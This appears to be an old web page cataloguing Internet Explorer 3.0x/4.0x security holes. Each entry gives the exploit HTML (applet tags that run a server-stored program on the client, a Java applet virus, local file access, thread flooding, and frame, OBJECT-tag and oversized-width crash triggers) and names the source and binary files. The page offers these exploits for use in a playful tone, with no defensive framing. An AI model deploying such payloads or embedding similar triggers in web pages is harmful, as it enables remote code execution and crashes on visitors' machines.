M$IE Holes collection.


"Native JRTL methods call" security hole in M$IE3.0x JavaVM
Subject Example HTML code for exploit Source code Compiled (binary) code Test subj ;)
Execute program, stored on server, at remote client host <applet code="RemotExec.class" width=1 height=1> <param name=exec value="elchtest.exe"> </applet> RemotExec.java Test
Simple Java applet virus (live in Win95+M$IE 3.0x+Personal Web Server) <applet code="shadow.class" width=1 height=1> </applet> shadow.java Test
Get access to local file system from Java applet (Some functions not implemented) <applet code="Test.class" width=640 height=480> </applet> Test.java Test

Threads Flood (M$IE 3.0x/4.0x)
Subject Example HTML code for exploit Source code Compiled (binary) code Test subj ;)
Threads flood <applet code="fl00d.class" width=1 height=1> </applet> fl00d.java fl00d.class Test

Frame crash (M$IE 4.0x)
Subject Example HTML code for exploit Test subj ;)
Frame crash <frameset> <frame src="framefl00d.html"> </frameset> Test

"Ghosting" attack (M$IE 4.0x+Windows98 Active Desktop)
Subject Example HTML code for exploit Source code Compiled (binary) code Test subj ;)
"Ghosting" attack <applet code="zealand.class" width=1600 height=800> </applet> zealand.java zealand.class Test

<OBJECT> tag crash (M$IE 4.0x)
Subject Example HTML code for exploit Test subj ;)
<OBJECT> tag crash <OBJECT CLASSID=#> </OBJECT> Test
Big "width=" crash (M$IE 4.0x)
Subject Example HTML code for exploit Test subj ;)
Big "width=" crash <img src="/icons/burst.gif" width=0000... (string > 100 chars)> Test
...mail me...
...to be continue...